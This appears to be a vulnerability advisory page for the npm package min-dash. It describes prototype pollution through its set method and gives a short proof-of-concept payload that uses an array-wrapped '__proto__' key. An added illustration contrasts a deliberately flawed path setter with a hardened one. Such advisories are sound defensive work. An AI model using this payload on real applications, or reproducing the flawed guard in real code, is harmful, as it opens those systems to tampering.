Advisories for Npm/Min-Dash package

2022

Prototype pollution in min-dash

The set method is vulnerable to prototype pollution with specially crafted inputs.

    // insert the following into poc.js and run node poc.js (after installing the package)
    let parser = require("min-dash");
    parser.set({}, [["__proto__"], "polluted"], "success");
    console.log(polluted);

Duplicate Advisory: Prototype Pollution in min-dash

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-2m53-83f3-562j. This link is maintained to preserve external references.

Original Description

The package min-dash before 3.8.1 is vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.
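An added illustration of the failure mode both advisories describe (the array-wrapped key in the PoC and the "missing enforcement of key types"). It is not min-dash's code: `looseSet`, `strictSet` and `pollutes` are hypothetical names, and the value-only guard in `looseSet` is an assumed example of a check that ignores key types.

```javascript
// Added example; constructed for illustration, not taken from min-dash.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Path setter whose guard compares keys by value only. A key such as
// ['__proto__'] is an array, so Set#has() does not match it, yet it
// coerces to the string '__proto__' when used as a property name.
function looseSet(target, path, value) {
  let node = target;
  path.forEach((key, i) => {
    if (FORBIDDEN.has(key)) throw new Error('illegal key: ' + key);
    if (i === path.length - 1) { node[key] = value; return; }
    if (node[key] === null || typeof node[key] !== 'object') node[key] = {};
    node = node[key];
  });
  return target;
}

// Hardened variant: every key must be a string or number, and the
// forbidden names are checked after that. The whole path is validated
// before anything is written, so a rejected call leaves no partial state.
function strictSet(target, path, value) {
  for (const key of path) {
    const t = typeof key;
    if (t !== 'string' && t !== 'number') {
      throw new TypeError('path keys must be strings or numbers');
    }
    if (FORBIDDEN.has(String(key))) throw new Error('illegal key: ' + key);
  }
  return looseSet(target, path, value);
}

// Runs a setter on a fresh object and reports whether Object.prototype
// gained the marker property (the last path element). Cleans up afterwards.
function pollutes(setter, path) {
  const marker = path[path.length - 1];
  try {
    setter({}, path, 'success');
  } catch (e) {
    return 'rejected: ' + e.name;
  }
  const hit = Object.prototype.hasOwnProperty.call(Object.prototype, marker);
  delete Object.prototype[marker];
  return hit ? 'polluted' : 'clean';
}

console.log(pollutes(looseSet, [['__proto__'], 'polluted']));
console.log(pollutes(strictSet, [['__proto__'], 'polluted']));
```
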